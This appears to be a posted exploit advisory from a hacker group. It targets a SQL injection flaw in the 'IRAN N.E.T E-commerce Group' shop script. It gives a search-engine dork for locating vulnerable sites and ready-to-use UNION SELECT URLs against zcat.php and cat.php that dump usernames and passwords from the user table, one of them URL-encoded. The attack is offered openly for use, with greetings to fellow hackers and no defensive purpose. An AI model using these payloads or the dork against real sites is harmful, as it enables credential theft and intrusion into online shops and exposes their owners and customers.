view source print? ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] IRAN N.E.T E-commerce Group SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://iranmc.org [+] script : IRAN N.E.T E-commerce Group SQL Injection Vulnerability [+] Download : http://iranmc.org/index.php?id=7 sell (script with hosting) [+] Vulnerability : SQL injection [+] Dork :inurl:"zcat.php?id=" **************************************************************************/ [ Vulnerable File ] http://server/zcat.php?id=[N.A.S.T ] [ Exploit ] http://server/zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user http://server/cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user [ ExOMPLE ] http://server/zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user [ GReet ] [+] :xcv-dz , CLAW , LE0N , hacker.ps , exploit-db.com , ALL HACKERS MUSLIMS